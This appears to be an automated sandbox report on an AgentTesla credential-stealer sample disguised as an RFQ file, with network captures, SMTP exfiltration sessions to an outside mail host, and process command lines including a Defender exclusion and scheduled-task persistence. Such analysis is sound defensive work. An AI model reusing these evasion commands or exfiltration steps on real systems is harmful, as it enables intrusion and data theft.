                                                                      .rsrc0x900000x6080x800False0.3388671875data3.42970179961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x920000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_VERSION0x900900x378data
                                                                      RT_MANIFEST0x904180x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright 2016
                                                                      Assembly Version1.0.0.0
                                                                      InternalNameManifestBuild.exe
                                                                      FileVersion1.1.0.0
                                                                      CompanyNameParadoxlost
                                                                      LegalTrademarks
                                                                      Comments
                                                                      ProductNameParadoxlost UX
                                                                      ProductVersion1.1.0
                                                                      FileDescriptionParadoxlost WinForms Theme Engine
                                                                      OriginalFilenameManifestBuild.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      09/28/21-10:31:27.667434TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49822587192.168.2.3208.91.198.143
                                                                      09/28/21-10:31:30.617798TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49823587192.168.2.3208.91.198.143

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 28, 2021 10:31:26.342025995 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:26.493223906 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:26.493463993 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:26.735847950 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:26.736715078 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:26.887940884 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:26.887979031 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:26.889251947 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.041273117 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.041785955 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.195133924 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.196082115 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.348571062 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.349070072 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.512957096 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.513542891 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.665407896 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.667433977 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.667670012 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.668782949 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.668942928 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:27.818767071 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.819958925 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.928854942 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:27.970691919 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:28.984424114 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.136096954 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.136126041 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.136241913 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.136490107 CEST49822587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.167535067 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.287517071 CEST58749822208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.306510925 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.306632042 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.449306011 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.449784994 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.588723898 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.588752031 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.589128971 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.731048107 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.731529951 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:29.872673988 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:29.872944117 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.013391972 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.013911963 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.193084955 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.475528955 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.475820065 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.615092039 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.615348101 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.617691040 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.617798090 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.617872953 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.617980003 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.618125916 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.618184090 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.618247032 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.618314981 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:31:30.757785082 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.758121014 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.758151054 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.758178949 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.870359898 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:31:30.924146891 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:33:05.988455057 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:33:06.137876034 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:33:06.137906075 CEST58749823208.91.198.143192.168.2.3
                                                                      Sep 28, 2021 10:33:06.138176918 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:33:06.138390064 CEST49823587192.168.2.3208.91.198.143
                                                                      Sep 28, 2021 10:33:06.287689924 CEST58749823208.91.198.143192.168.2.3

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 28, 2021 10:29:35.660520077 CEST6078453192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:29:35.679882050 CEST53607848.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:00.452944040 CEST5114353192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:00.480514050 CEST53511438.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:28.379966021 CEST5600953192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:28.404092073 CEST53560098.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:28.452996969 CEST5902653192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:28.477240086 CEST53590268.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:29.368726969 CEST4957253192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:29.403021097 CEST53495728.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:31.558597088 CEST6082353192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:31.592921019 CEST53608238.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:35.775904894 CEST5213053192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:35.810450077 CEST53521308.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:38.743765116 CEST5510253192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:38.767893076 CEST53551028.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:42.488110065 CEST5623653192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:42.507786989 CEST53562368.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:57.051906109 CEST5652753192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:57.083709955 CEST53565278.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:57.502300978 CEST4955953192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:57.556637049 CEST53495598.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:58.634100914 CEST5265053192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:58.653728962 CEST53526508.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:59.192631960 CEST6329753192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:59.210274935 CEST53632978.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:30:59.572069883 CEST5836153192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:30:59.596374989 CEST53583618.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:00.092650890 CEST5361553192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:00.095884085 CEST5072853192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:00.111819029 CEST53536158.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:00.115194082 CEST53507288.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:00.604439974 CEST5377753192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:00.623935938 CEST53537778.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:01.110369921 CEST5710653192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:01.130202055 CEST53571068.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:01.965946913 CEST6035253192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:01.985426903 CEST53603528.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:02.923166990 CEST5677353192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:02.942817926 CEST53567738.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:03.358903885 CEST6098253192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:03.379379034 CEST53609828.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:14.071276903 CEST5805853192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:14.091012001 CEST53580588.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:25.976142883 CEST6436753192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:26.137835979 CEST53643678.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:26.152332067 CEST5153953192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:26.304353952 CEST53515398.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:31.054466009 CEST5539353192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:31.082618952 CEST53553938.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:31:40.534465075 CEST5058553192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:31:40.554109097 CEST53505858.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:32:03.426831961 CEST6345653192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:32:03.454371929 CEST53634568.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:32:12.913917065 CEST5854053192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:32:12.933233976 CEST53585408.8.8.8192.168.2.3
                                                                      Sep 28, 2021 10:33:33.606976032 CEST5510853192.168.2.38.8.8.8
                                                                      Sep 28, 2021 10:33:33.626394987 CEST53551088.8.8.8192.168.2.3

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Sep 28, 2021 10:31:25.976142883 CEST192.168.2.38.8.8.80x5d4bStandard query (0)smtp.regalbelloit.comA (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.152332067 CEST192.168.2.38.8.8.80x5fb0Standard query (0)smtp.regalbelloit.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Sep 28, 2021 10:31:26.137835979 CEST8.8.8.8192.168.2.30x5d4bNo error (0)smtp.regalbelloit.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.137835979 CEST8.8.8.8192.168.2.30x5d4bNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.137835979 CEST8.8.8.8192.168.2.30x5d4bNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.137835979 CEST8.8.8.8192.168.2.30x5d4bNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.137835979 CEST8.8.8.8192.168.2.30x5d4bNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.304353952 CEST8.8.8.8192.168.2.30x5fb0No error (0)smtp.regalbelloit.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.304353952 CEST8.8.8.8192.168.2.30x5fb0No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.304353952 CEST8.8.8.8192.168.2.30x5fb0No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.304353952 CEST8.8.8.8192.168.2.30x5fb0No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                      Sep 28, 2021 10:31:26.304353952 CEST8.8.8.8192.168.2.30x5fb0No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)

                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Sep 28, 2021 10:31:26.735847950 CEST58749822208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                      Sep 28, 2021 10:31:26.736715078 CEST49822587192.168.2.3208.91.198.143EHLO 226533
                                                                      Sep 28, 2021 10:31:26.887979031 CEST58749822208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                      250-PIPELINING
                                                                      250-SIZE 41648128
                                                                      250-VRFY
                                                                      250-ETRN
                                                                      250-STARTTLS
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-AUTH=PLAIN LOGIN
                                                                      250-ENHANCEDSTATUSCODES
                                                                      250-8BITMIME
                                                                      250 DSN
                                                                      Sep 28, 2021 10:31:26.889251947 CEST49822587192.168.2.3208.91.198.143AUTH login dXNlckByZWdhbGJlbGxvaXQuY29t
                                                                      Sep 28, 2021 10:31:27.041273117 CEST58749822208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                      Sep 28, 2021 10:31:27.195133924 CEST58749822208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                      Sep 28, 2021 10:31:27.196082115 CEST49822587192.168.2.3208.91.198.143MAIL FROM:<user@regalbelloit.com>
                                                                      Sep 28, 2021 10:31:27.348571062 CEST58749822208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                      Sep 28, 2021 10:31:27.349070072 CEST49822587192.168.2.3208.91.198.143RCPT TO:<user@regalbelloit.com>
                                                                      Sep 28, 2021 10:31:27.512957096 CEST58749822208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                      Sep 28, 2021 10:31:27.513542891 CEST49822587192.168.2.3208.91.198.143DATA
                                                                      Sep 28, 2021 10:31:27.665407896 CEST58749822208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                      Sep 28, 2021 10:31:27.668942928 CEST49822587192.168.2.3208.91.198.143.
                                                                      Sep 28, 2021 10:31:27.928854942 CEST58749822208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 69B402C00A1
                                                                      Sep 28, 2021 10:31:28.984424114 CEST49822587192.168.2.3208.91.198.143QUIT
                                                                      Sep 28, 2021 10:31:29.136096954 CEST58749822208.91.198.143192.168.2.3221 2.0.0 Bye
                                                                      Sep 28, 2021 10:31:29.449306011 CEST58749823208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                      Sep 28, 2021 10:31:29.449784994 CEST49823587192.168.2.3208.91.198.143EHLO 226533
                                                                      Sep 28, 2021 10:31:29.588752031 CEST58749823208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                      250-PIPELINING
                                                                      250-SIZE 41648128
                                                                      250-VRFY
                                                                      250-ETRN
                                                                      250-STARTTLS
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-AUTH=PLAIN LOGIN
                                                                      250-ENHANCEDSTATUSCODES
                                                                      250-8BITMIME
                                                                      250 DSN
                                                                      Sep 28, 2021 10:31:29.589128971 CEST49823587192.168.2.3208.91.198.143AUTH login dXNlckByZWdhbGJlbGxvaXQuY29t
                                                                      Sep 28, 2021 10:31:29.731048107 CEST58749823208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                      Sep 28, 2021 10:31:29.872673988 CEST58749823208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                      Sep 28, 2021 10:31:29.872944117 CEST49823587192.168.2.3208.91.198.143MAIL FROM:<user@regalbelloit.com>
                                                                      Sep 28, 2021 10:31:30.013391972 CEST58749823208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                      Sep 28, 2021 10:31:30.013911963 CEST49823587192.168.2.3208.91.198.143RCPT TO:<user@regalbelloit.com>
                                                                      Sep 28, 2021 10:31:30.475528955 CEST58749823208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                      Sep 28, 2021 10:31:30.475820065 CEST49823587192.168.2.3208.91.198.143DATA
                                                                      Sep 28, 2021 10:31:30.615348101 CEST58749823208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                      Sep 28, 2021 10:31:30.618314981 CEST49823587192.168.2.3208.91.198.143.
                                                                      Sep 28, 2021 10:31:30.870359898 CEST58749823208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 187352C7D9D
                                                                      Sep 28, 2021 10:33:05.988455057 CEST49823587192.168.2.3208.91.198.143QUIT
                                                                      Sep 28, 2021 10:33:06.137876034 CEST58749823208.91.198.143192.168.2.3221 2.0.0 Bye

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:10:29:40
                                                                      Start date:28/09/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                                                                      Imagebase:0xce0000
                                                                      File size:581120 bytes
                                                                      MD5 hash:724BCE9BE00D521C9AE6075D50434B11
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313035144.0000000004450000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313035144.0000000004450000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:10:29:44
                                                                      Start date:28/09/2021
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                                                                      Imagebase:0x1200000
                                                                      File size:430592 bytes
                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:29:45
                                                                      Start date:28/09/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7f20f0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:29:46
                                                                      Start date:28/09/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sucEaYWuNda' /XML 'C:\Users\user\AppData\Local\Temp\tmp1646.tmp'
                                                                      Imagebase:0xca0000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:29:46
                                                                      Start date:28/09/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7f20f0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:10:29:46
                                                                      Start date:28/09/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      Imagebase:0xdc0000
                                                                      File size:581120 bytes
                                                                      MD5 hash:724BCE9BE00D521C9AE6075D50434B11
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >